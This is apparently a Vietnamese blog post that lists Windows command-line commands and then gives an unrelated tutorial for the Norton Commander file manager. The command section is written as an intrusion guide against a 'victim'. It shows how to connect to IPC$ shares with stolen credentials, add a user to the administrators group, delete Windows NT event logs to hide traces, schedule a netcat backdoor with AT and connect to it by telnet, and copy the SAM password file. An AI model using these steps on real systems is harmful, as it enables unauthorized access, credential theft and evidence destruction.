Cú pháp: ping ip/host [/t][/a][/l][/n]
- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính.
- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C.
- Tham số /a: Nhận địa chỉ IP từ tên host.
- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt.
- Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5.
Công dụng: Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)...
2. Lệnh Tracert:
Cú pháp: tracert ip/host
Công dụng: Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.
3. Lệnh Net Send:
Gửi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP)
Cú pháp: Net send ip/host thông_điệp_muốn_gởi
Công dụng: Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi. Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau : Code: Net send * hello!I'm pro_hacker_invn
4. Lệnh Netstat:
Cú pháp: Netstat [/a][/e][/n]
- Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening).
- Tham số /e: hiển thị các thông tin thống kê Ethernet.
- Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối...
Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm.
Công dụng: Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta.
5. Lệnh IPCONFIG:
Cú pháp: ipconfig /all
Công dụng: Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng...
6. Lệnh FTP (truyền tải file):Cú pháp: ftp ip/host
Nếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau: Code: ftp>_ Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP. Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ.
Một số lệnh ftp cơ bản:
-cd thu_muc: chuyển sang thư mục khác trên máy chủ.
- dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ.
- mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ.
- rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ.
- put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.
- close: Đóng phiên làm việc.
- quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.
Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu.
Công dụng: FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp.
7. Lệnh Net View:
Cú pháp: Net View [\\computer/Domain[:ten_domain]]
Công dụng: Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng. + Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.
8. Lệnh Net Use:
Cú pháp: Net use \\ip\ipc$ "pass" /user:"xxx"
- ip: địa chỉ IP của victim.
- xxx: user của máy victim
- pass: password của user Giả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau: Code: Net use \\68.135.23.25\ipc$ "12345" /user:"victim".
Công dụng: kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).
9. Lệnh Net User:
Cú pháp: Net User [username pass] [/add]
- Username : tên user cấn add.
- pass : password của user cần add Khi đã add đc user vào rùi thì ta tiến hành add user này vào nhóm administrator. Code: Net Localgroup Adminstrator [username] [/add]
Công dụng: Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính. Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào. Ví dụ: ta tiến hành add thêm một user có tên là xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau: Code: Net User xuanhoa banvatoi /add. Sau đó add user xuanhoa vào nhóm adminnistrator Code: Net Localgroup Administrator xuanhoa /add.
10. Lệnh Shutdown:
Cú pháp: Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d upx:yy] (áp dụng cho win XP)
- Tham số -m\\ip: ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,...
- Tham số -t xx: đặt thời gian cho việc thực hiện lệnh shutdown.
- Tham số -l: logg off (lưu ý ko thể thực hiện khi remote).
- Tham số -s: shutdown
- Tham số -r: shutdown và restart.
- Tham số -a: không cho shutdown.
- Tham số -f: shutdown mà ko cảnh báo.
- Tham số -c "comment": lời cảnh báo trước khi shutdown.
- Tham số -d upx:yy: ko rõ Code: shutdown \\ip (áp dụng win NT) Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn!
Công dụng: Shutdown máy tính.
11. Lệnh DIR:
Cú pháp: DIR [drive:][path][filename]
Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn.
Công dụng: Để xem file, folder.
12. Lệnh DEL :
Cú pháp: DEL [drive:][path][filename]
Lệnh này cũng căn bản rùi, ko phải nói nhìu.
Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT: Code: del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log
13. Lệnh tạo ổ đĩa ảo trên computer:
Cú pháp: Net use z: \\ip\C$ ( hoặc là IPC$ )
- Z là của mình...còn C$ là của Victim.
Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc).
14. Lệnh Net Time:Cú pháp: Net Time \\ip
Công dụng: Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.
15. Lệnh AT:Cú pháp: AT \\ip
Công dụng: Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng. Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 . Code: Net Time \\68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00. Code: AT \\68.135.23.25 12:3 nc.exe Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.
16. Lệnh Telnet:
Cú pháp: telnet host port
Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie Code: telnet 68.135.23.25 99
Công dụng: Kết nối đến host qua port xx.
17. Lệnh COPY:
Cú pháp: COPY /? Dùng lệnh trên để rõ hơn!
Công dụng: Copy file, tui khỏi nói thêm nhé. Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Code: Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Code: Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\
18. Lệnh SET:
Cú pháp: SET
Công dụng: Displays, sets, or removes cmd.exe enviroment variables.
19. Lệnh Nbtstat:
Cú pháp: Nbtstat /?
Gõ lệnh trên để rõ hơn về lệnh này.
Công dụng: Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP).
Trên đây là một số hiểu biết hạn hẹp của em về các lệnh CMD, em đã đọc được từ rất nhiều nguồn khác nhau, nay tổng hợp lại cho mọi người tham khảo. Có một số lệnh em vẫn chưa hiểu cấu trúc lệnh và chưa có điều kiện để thực hành thử nên ko hướng dẫn kỹ.
NC và Cách sử dụng:
1. NC là gì?
NC là phần mềm quản lý tệp và thư mục, cho phép sử dụng các lệnh cơ bản của DOS dưới dạng nhanh chóng, hiệu quả hơn.
2.Phương pháp làm việc:
- Sử dụng phím chức năng để thi hành lệnh, Sử dụng hộp thoại để giao tiếp với người dùng.
- Sử dụng hình ảnh trực quan.
- Hỗ trợ việc sử dụng chuột trong các hoạt động của chương trình.
- Có phần hướng dẫn sử dụng (F1).
Để sử dụng được NC ít nhất ta phải có các tập tin sau:
· NC. EXE
· NCMAIN. EXE
· NC.HLP
· NC.INI
3. Khởi động và thoát khỏi NC:
3.1. Khởi động NC:
Chương trình NC. EXE thường được đặt trong thư mục NC của ổ đĩa C
Để khởi động NC ta chạy tập tin NC. EXE từ dấu nhắc lệnh của MS-DOS như sau:
C:\>NC\NC
3.2. Thoát khỏi NC:
Để thoát khỏi NC ta ấn phím F10 rồi chon YES.
3.3. Màn hình làm việc của NC:
Dòng dưới cùng thể hiện một số phím chức năng tắt tương ứng với các phím từ F1 đến F10
và tổ hợp CTRL + Fn, ALT + Fn, (trong đó n = 1..10 ). trong đó:
Lệnh F1: (Help)Lệnh trợ giúp
Lệnh F2: (Menu)Lệnh tạo menu cho người sử dụng
Lệnh F3: (View) Lệnh xem nội dung tệp
Lệnh F4: (Edit)Lệnh xem và sửa nội dung tệp
Lệnh F5: (Copy)Lệnh sao chép (copy)
Lệnh F6: (RenMov)Lệnh đổi tên và di chuyển tập tin
Lệnh F7: (MkDir)Lệnh tạo thư mục
Lệnh F8: (Delete)Lệnh xoá thư mục và tập tin
Lệnh F9: (PullDn)Truy cập thanh menu của NC
Lệnh F10: (Quit)Thoát khỏi NC.
Lệnh ATL + F1: Lệnh chuyển đổi ổ đĩa bên cửa sổ bên trái.
Lệnh ATL + F2: Lệnh chuyển đổi ổ đĩa bên cửa sổ bên phải.
Lệnh ATL + F3: Lệnh xem nội dung tập tin
Lệnh ATL + F4: Lệnh soạn thảo tập tin
Lệnh ATL + F5: Lệnh nén các tập tin
Lệnh ATL + F6: Lệnh giải nén tập tin nén
Lệnh ATL + F7: Lệnh tìm kiếm
Lệnh ATL + F8: Lệnh hiển thị các dòng lệnh sử dụng gần đây nhất
Lệnh ATL + F9: Lênh chuyển đổi màn hình về dạng 40 dòng hoặc 25 dòng.
Lệnh ATL + F10: Lệnh hiển thị cây thư mục của ổ đĩa hiện thời.
Lệnh CTRL + F1: Tắt mở khung panel bên trái
Lệnh CTRL + F2: Tắt mở khung panel bên phi
Lệnh CTRL + F3: Sắp xếp tệp và thư mục theo tên
Lệnh CTRL + F4: Sắp xếp tệp và thư mục theo phần mở rộng
Lệnh CTRL + F5: Sắp xếp tệp và thư mục theo thời gian tạo
Lệnh CTRL + F6: Sắp xếp tệp và thư mục theo kích thước tệp
Lệnh CTRL + F7: Bỏ chế độ Sắp xếp
Lệnh CTRL + F8: So sánh 2 thư mục với nhau
Lệnh CTRL + F9: In tệp
Lệnh CTRL + F10: Chia hoặc trộn tệp
Ngoài các tổ hợp phím trên, NC còn chứa nhiều lệnh khác trên thanh menu trỏ xuống khi bạn nhấn phím F9.Tất cả các công tác làm việc với tệp, trước tiên bạn phải dùng các phím di chuyển để di chuyển thanh sáng đến tệp cần làm việc. Dùng phím TAB để di chuyển thanh sáng qua lại giữa 2 khung Panel, dùng phím Insert để chọn các tệp cần làm việc với các lệnh như Copy, Move,Delete ... Dùng phím (+) bên phím số để chọn tất cả các tệp và thư mục trong thư mục hiện thời, phím (-) để bỏ chọn, phím để đổi chọn. Các nguyên tắc làm việc với thư mục giống như trên MS-DOS, tuy nhiên cần chú ý rằng chương trình đã tạo ra một giao diện thân thiện hơn để ta làm việc vì vậy mà có một số nguyên tắc làm trong MS-DOS có thể bỏ qua trong NC. Việc chuyển đổi thư mục hiện hành rất đơn giản, bạn chỉ việc di chuyển thanh sáng đến thư mục cần vào và nhấn ENTER, muốn thoát khỏi thư mục trở về thư mục cấp cao hơn, hãy di chuyển thanh sáng về dòng có hai dấu chấm (..) và nhấn ENTER.
4. Một số ví dụ về cách thực hiện các lệnh trong NC:
4.1. Tạo mới một thư mục:
Di chuyển thanh sáng đến vị trí cần tạo thư mục
- Nhấn F7
- Nhập tên thư mục cần tạo sau đó nhấn ENTER.
4.2. Tạo mới tệp:
- Di chuyển thanh sáng đến vị trí cần tạo tệp
- Nhấn tổ hợp phím SHIFT+F4 và nhập tên tệp cần tạo
- NC sẽ mở ra cho bạn một khung hội thoại để nhập nội dung tệp, khi nhập xong bạn nhấn phím F2 để ghi lại nội dung và ấn ESC để thoát.
4.3. Sao chép, di chuyển:
- Chọn các tệp, thư mục muốn sao chép hoặc di chuyển trên một khung panel
- Trên khung panel còn lại dùng thanh sáng di chuyển đến vị trí cần sao chép hoặc di chuyển đến.
- Di chuyển thanh sáng về khung panel chứa các tệp được chọn
- Nhấn F5 (copy) hoặc F6 (move)
4.4. Nén các tập tin:
- Chọn các tệp cần nén ở trên một khung Panel, trên khung panel còn lại di chuyển thanh sáng vào trong thư mục muốn để tệp đích.
- Di chuyển thanh sáng về khung panel có tệp chọn
- Nhấn ALT + F5
- Đưa tên tệp đích vào (không cần phần mở rộng)
4.5. Giải nén tệp:
- Chọn tệp cần giải nén ở trên một khung Panel, trên khung panel còn lại di chuyển thanh sáng vào trong thư mục muốn để các tệp sau khi giải nén.
- Di chuyển thanh sáng về khung panel có tệp chọn
- Nhấn ALT + F6
4.6. Chia một tệp thành nhiều tệp:
- Chọn tệp cần chia ra ở trên một khung Panel, trên khung panel còn lại di chuyển thanh sáng vào trong thư mục muốn để các tệp sau khi chia.
- Di chuyển thanh sáng về khung panel có tệp chọn
- Nhấn CTRL + F10
- Sau khi đưa số tệp cần chia ra trong mục Number of splids chọn Splids.
Các tệp sau khi được chia sẽ giữ nguyên tên như tệp đích và phần mở rộng mặc định là *. 001, *.002, ...
4.7. Trộn nhiều tệp được chia ra thành một tệp duy nhất:
- Chọn các tệp cần gộp lại ở trên một khung Panel, trên khung panel còn lại di chuyển thanh sáng vào trong thư mục muốn để các tệp sau khi được gộp lại.
- Di chuyển thanh sáng về khung panel có tệp chọn
- Nhấn CTRL + F10
- Sau khi đưa đường dẫn, tên tệp và phần mở rộng của tệp được gộp trong mục Merge n files to sau đó chọn Merge. (trong đó n là tổng số tệp chọn để gộp lại).
4.8. Xoá tệp và thư mục:
- Chọn các tệp và thư mục cần xoá
- Nhấn F8
- Một hộp hội thoại sẽ mở ra và hỏi xem chắc chắn bạn muốn xoá các tệp hoặc thư mục hay không, nếu chắc chắn các bạn chọn DELETE.
4.9. Tìm kiếm tệp:
- Di chuyển thanh sáng về ổ đĩa cần tìm kiếm
- Nhấn ALT + F7
- Đưa tên tệp cần tìm trong Find Files và chọn Start để bắt đầu. Nếu tìm thấy tệp thì trên danh sách phía trên sẽ hiển thị tên tệp, vị trí của tệp.
lethanhtam1911 |
Không có nhận xét nào:
Đăng nhận xét